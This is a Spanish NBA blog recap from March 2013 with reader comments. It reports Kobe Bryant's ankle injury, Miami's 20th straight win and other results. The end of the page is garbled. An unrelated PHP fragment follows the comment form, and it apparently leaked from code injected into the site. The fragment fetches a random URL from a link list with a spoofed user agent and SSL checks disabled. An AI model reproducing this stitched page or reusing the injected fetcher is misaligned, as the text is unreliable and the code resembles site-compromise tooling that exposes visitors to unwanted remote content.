La Crónica: Kobe out

14 de March de 2013 por txusma

Y Kobe cayó… Sí, señores, como un jarro de agua fría ha tenido que caer esto sobre los aficionados Lakers. Quedaban apenas 8 segundos de partido cuando Kobe encaraba a Dahntay Jones con el objetivo de mandar el partido a la prórroga. En la caída del salto tras el tiro, Kobe pisaba a Jones produciéndose una fuerte torcedura de tobillo. Las primeras pruebas no son muy esperanzadoras y de momento está fuera indefinidamente. Una lástima, ahora que los Lakers estaban en su mejor momento y venían remontando posiciones a marchas forzadas. En cuanto al partido, a Lakers se le vio excesivamente relajado con un Kobe Bryant muy fallón al inicio que se fue entonando con el paso del tiempo. Los amarillos caían con claridad al descanso pero en el tercer cuarto 20 puntos de Kobe los metían nuevamente en la lucha por llevarse el encuentro. En el último cuarto un buen Devin Harris, apoyado por Korver, mantenía por encima a los Hawks, que se llevaron una importante victoria en su lucha por escalar en su conferencia (92-96).

Miami alcanzó las 20 victorias consecutivas y se convierte en el cuarto equipo en la historia en conseguirlo tras Lakers (33), Rockets (22) y Bucks (20). Los Heat abrieron ventajas en el segundo cuarto pero Philadelphia recortó en los dos últimos e incluso llegó a estar por encima en el marcador a escasos minutos para el final. Desgraciadamente para ellos fueron los campeones los que anotaron en el último minuto para llevarse el partido (98-94). Una noche más (y van…) LeBron James se mostró imparable consiguiendo 27 puntos, 8 asistencias y 7 rebotes. Miami tiene al segundo del Este, Indiana, a diez partidos de diferencia. Precisamente ayer Indiana ganó de forma contundente a Minnesota con un gran Roy Hibbert que tendrá que alcanzar este nivel en Play Off si Pacers quiere plantar cara a Miami en una eventual final de conferencia (91-107). 

En la lucha por el tercer escalón del Oeste, Denver sigue con su buena racha y ayer logró la décima victoria consecutiva sin problemas tras dar un buen repaso a New York Knicks (94-117). Los Nuggets apenas encontraron rival ayer en los Knicks, a los que parece haber mirado un tuerto. A las recientes lesiones que han sufrido, ayer se unió la de Tyson Chandler que tuvo que dejar el partido doliéndose de la rodilla tras un choque con Corey Brewer. Los otros dos equipos implicados en la lucha se enfrentaban ayer en un interesantísimo duelo que cayó para el equipo visitante. Memphis impuso su ley en el Staples y continúa con su estupendo balance de victorias-derrotas tras los traspasos que modificaron la mitad de su plantilla (96-85). Parece que los cambios han sentado muy bien a los ositos y a día de hoy ya nadie discute que los traspasos han reforzado al equipo y aumentado sus opciones de cara a hacer algo grande esta misma temporada. Mike Conley y Marc Gasol, que tras la marcha de Gay han visto aumentados sus roles ofensivos, están respondiendo a la perfección y ayer lo demostraron una vez más con 17 (y 11 asistencias) y 21 puntos respectivamente. Clippers está teniendo un importante bajón de prestaciones que lo hace estar a día de hoy más cerca de la quinta posición que de la cuarta.

Continuando en el Oeste, Oklahoma no tuvo problemas para derrotar a Utah Jazz en un partido decidido al descanso (87-110). Ni media hora llegamos a ver ayer a las estrellas del Thunder,  en concreto 28 minutos cada uno, pero a Durant le bastaron para acabar el partido con 23 puntos, 10 rebotes y el lunar de 8 pérdidas. Westbrook, por su parte, se quedó muy cerca del triple doble. En Utah apenas Hayward dio la cara en un equipo que parece abatido tras ser superado por Lakers en la clasificación. Houston venció y consiguen poner tierra de por medio con Utah y no parece que se le vaya a escapar ya la plaza de Play Off. Ayer la victima de Harden & Co fue Phoenix Suns que no inquietó lo más mínimo a Houston (81-111) aunque el mejor ayer no fue Harden sino Motiejunas. Muchos llevamos reclamando desde el comienzo de temporada oportunidades para este chico y gracias a la marcha de Morris y Patterson estamos viendo que llevábamos razón. El chaval está respondiendo con unas prestaciones inmejorables. Ayer 19 puntos, 5 rebotes y 2 asistencias.

En el resto de partidos de la jornada, Washington  venció en casa a Milwaukee Bucks  (93-106) gracias a un gran último cuarto de los Wizards. John Wall terminó el partido con 23 puntos, 10 asistencias, 6  rebotes y 4 robos; Boston venció a Toronto sin despeinarse (88-112). Sacramento humilló  a Chicago (79-121) y Golden State Warriors se impuso a unos peleones Pistons de la mano de la pareja Curry y Lee (97-105).

PREMIOS

MVP: Tyreke Evans destapó el tarro de las esencias y nos ofreció todo un recital. Fueron 26 puntos, 5 rebotes, 7 asistencias y 3 robos. Stephen Curry sigue a gran nivel y lideró a los Warriors con 31 puntos y 8 asistencias.

Rookie: Donatas Motiejunas va cogiendo el ritmo y poco a poco va mejorando. Anoche consiguió su mejor marca anotadora de la temporada con 19 puntos.

Sorpresa: Trevor Booker se convirtió en el factor-x de los Wizards aportando su energía desde el banquillo. Finalizó el partido con 13 puntos y 12 rebotes.

Decepción: Jamal Crawford restó durante los 33 minutos que se pasó en cancha. Acabó el partido con 2 puntos tras anotar solo 1 de sus 10 tiros. Marco Bellinelli falló los 9 tiros que intentó y se fue al vestuario sin anotar. Carmelo Anthony tampoco vivió una de sus mejores noche y acabo con 9 puntos.

Esfuerzo en vano: A los Bucks se les atragantaron los Wizards a pesar de los esfuerzos de Monta Ellis autor de 26 puntos y 8 asistencias. Thaddeus Young y Jrue Holiday plantaron cara a los Heat con 24 puntos y 15 rebotes el primero y 21 puntos, 7 asistencias y 7 rebotes el segundo pero finalmente sucumbieron ante LeBron James y compañía.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    He sido muy crítico con los Lakers esta temporada,más aún con Howard,pero aún así que me tomo de mala gana la lesión de Kobe,porque después de la temporada que se está marcando,siendo él el tio que está llevando a los Lakers a PO en una temporada lamentable de estos,su baja en este mes de calendario fácil para ellos puede suponer una herida de muerte.Espero que esa baja indefenida sea corta pero de momento se quedan sin su líder y es ahora donde el resto deben dar el paso adelante.Por cierto,se calcó otro triple en los instantes finales que fue una maravilla,body control 100%.Y otra cosa,la temporada se le está haciendo larga a Clark,acostumbrado a jugar nada o casi nada,el chaval ha bajado su aportación en los últimos partidos.De todos modos el partido de los Lakers hace bueno eso de que cualquiera puede ganarles.

    Lo mejor de aquí a final de temporada para los Lakers es que uno de sus rivales sean los Jazz.Houston sabe a que juega pero Utah…y no es por las sensaciones de esta noche,que estaba dentro de las previsiones caer ante Oklahoma.Además me atrevo a decir que en condiciones normales lo ideal para la franquicia a estas alturas sería no tener opción alguna de meterse en PO y aclarar su posición respecto a los jóvenes jugadores que tienen,darles cancha para que fueran progresando los Kanter,Favors,Burks…pero metidos en vereda tienen que luchar por meterse en postemporada y una vez ahí creo que tienen todas las papeletas para llevarse un 4-0 sea cual sea el rival.Ayer,leyendo aficionados de los Jazz,había una corriente de opinión que decía que había que dejar ir a Jefferson y Millsap,dar minutos a los cachorrillos en una especie de tanqueo disimulado y draftear en 2014 a Jabari Parker,jugador con pinta de jugón que además es mormón.

    Por lo demás,buena noticia que Ricky vaya encontrando sensaciones con regularidad en esta especie de pretemporada para la 13/14,sobre todo que se encuentre seguro en sus tiros,y destacar las sensaciones de los Bulls.Mis sensaciones con ellos son las de ese equipo que se vino abajo en los PO de 2012 cuando se lesionó Rose en el partido de PO ante 76ers.Han perdido muchísima confianza desde febrero.

      Citar

  2. rumbero dice:
    #2

    Ricky estuvo fenomenal, ejerciendo de lider y con un primer cuarto que fue una maravilla. Pero lo que comentábamos, el equipo es el que es y si vas a Indiana con Stiemsma, Gelabale, Cunningham y encima Shved y Barea no tienen el día en el tiro pues lo normal es que palmes de 25, pero lo cierto es que aguantaron con desventajas sobre los 10 puntos hasta el final del último cuarto. Y Ricky se fue con 10 asistencias que podrian haber sido 20 con algo más de acierto. Indiana en su línea de equipo sólido, aprovechando la merendola que se pegó Hibbert con los ¿interiores? de los Wolves y apretando más en defensa en la segunda parte.

    Y en los Knicks se encienden las alarmas. Mini crisis de juego, Carmelo que se vuelve a NY en medio de la gira para someterse a pruebas, Chandler que no acaba el partido por un golpe en la rodilla y la ya conocida baja de Amare.

      Citar

  3. Esteban dice:
    #3

    wow montiejunas jugando a este nive era lo que le faltaba a los rockets, mamita

    un all-star como harden
    un centro a precio razonable super reboteador y gran defensor
    tantos crios como terrence jones, thomas robinson, parsons y montiejunas

    solo les falta que LIN se vuielva un base mas convincente para ser el equipo del futuro

      Citar

  4. Esteban dice:
    #4

    los wolves siguen perdiendo, evidentemente no ven con malos ojos hacerse con un top 5 en el proximo draft,

      Citar

  5. HisRoyalAirness dice:
    #5

    Esteban dudo que sea por eso porque lo dan todo.
    Es más, para mí el esfuerzo en vano fue el de Ricky, hasta los comentaristas decían que había asistencias suyas que era increíble que no se anotaran y que en otro equipo rondaría las 20

      Citar

  6. MagicJohnson32 dice:
    #6

    Menos mal que no he hecho yo la crónica hoy, porque la habría titulado “Dahntay Jones joputa”.

      Citar

  7. Esteban dice:
    #7

    es grave lo de kobe? si se pierde 3 partidos los lakers pueden olvidarse de PO, a menos que cuando regresen ganen todos su juegos

      Citar

  8. MagicJohnson32 dice:
    #8

    Es serio, eso seguro, aunque la gravedad de un esguince no se sabe hasta horas después. Siempre que le pasa algo así, Kobe se pasa toda la noche con hielo en el tobillo para reducir al máximo la hinchazón, ya que cuanto más se hinche, más tarda en recuperarse, obviamente. Y luego, claro, el tiempo que se pierde un jugador va en función de su resistencia al dolor.

    Con todo, dudo muchísimo que Kobe juegue mañana, sería un milagro no, lo siguiente. Lo siguiente es un back-to-back domingo y lunes contra Sacramento y Phoenix, y son dos equipos que los Lakers deberían de ser capaces de ganar sin Kobe. Si descansa esos tres partidos, el siguiente no es hasta el viernes siguiente, con lo que serían 8 días de descanso.

      Citar

  9. Esteban dice:
    #9

    que pena, justo en la posicion del 2!!! la mas sensible para los lakers, entrare meeks de titular, pero eso significa que no tienen ni 2 ni 3 suplente ya que meeks cubre ambas funciones con alguna ayuda de jamison

    una pena, los lakers son kobe y sin pau, pequeña perdida no?

      Citar

  10. Simon dice:
    #10

    MagicJohnson32:

    Con todo, dudo muchísimo que Kobe juegue mañana, sería un milagro no, lo siguiente. Lo siguiente es un back-to-back domingo y lunes contra Sacramento y Phoenix, y son dos equipos que los Lakers deberían de ser capaces de ganar sin Kobe. Si descansa esos tres partidos, el siguiente no es hasta el viernes siguiente, con lo que serían 8 días de descanso.

    Hombre si ganan esos tres, supondría un respiro importante para Lakers y Bryant incluso podría descansar una semana mas para cuidar su esguince… Además, Utah no está para tirar cohetes… asi que yo creo que lo mejor es que Bryant repose y se cure bien ese esguince y sólo en caso de verse superados por Utah que adelante su vuelta. Lakers debe ser capaz de mantener el nivel contra Utah sin la necesidad de Bryant.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>